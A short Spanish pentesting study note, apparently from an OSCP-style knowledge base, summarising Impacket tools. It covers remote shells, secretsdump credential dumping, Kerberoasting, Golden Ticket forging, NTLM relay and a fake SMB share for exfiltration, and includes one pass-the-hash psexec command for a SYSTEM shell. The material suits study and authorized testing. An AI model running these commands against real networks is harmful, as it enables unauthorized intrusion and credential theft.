JARVIS/nucleo/saber/conocimiento/05 - Active Directory/Impacket.md
sito 7e06ce46cf saber: pack de metodologia publico (conocimiento/) + doc del RAG
El repo trae ahora ~73 docs de metodologia de pentesting (estilo OSCP,
scrubeados de datos personales) que indexa.py indexa: un clon recien hecho ya
sabe de enumeracion, explotacion web, shells, privesc, Active Directory,
cracking... con los comandos, sin ningun dato privado. docs/rag.md lo refleja.
2026-08-16 17:58:41 +02:00

1.1 KiB

Impacket

Suite Python que corre en TU Kali. Habla los protocolos de Windows (SMB, RPC, Kerberos) sin ser Windows. Es como tener un "Windows hablante" en Kali.

Los más útiles

impacket-psexec        → shell en la víctima si tienes creds (estilo PsExec)
impacket-wmiexec       → ejecutar comandos sin tocar disco
impacket-smbexec       → otra ejecución remota
impacket-secretsdump   → vuelca NTDS.dit y SAM de un DC en remoto → secretsdump
impacket-GetUserSPNs   → Kerberoasting
impacket-GetNPUsers    → AS-REP Roasting
impacket-getTGT        → pide/forja un TGT con cred conocida
impacket-getST         → pide un service ticket
impacket-smbserver     → share SMB falso para exfiltrar a Kali (Transferencia de ficheros)
impacket-ntlmrelayx    → relay NTLM
impacket-ticketer      → forja tickets → Golden Ticket

Lateral con hash (sin reverse shell nueva)

impacket-psexec -hashes :NTLMHASH 'admin@10.10.10.20'

Shell SYSTEM en otra máquina, autenticado y limpio → Pass-the-Hash, Movimiento lateral.

Relacionado: Mimikatz · Active Directory · OSCP MOC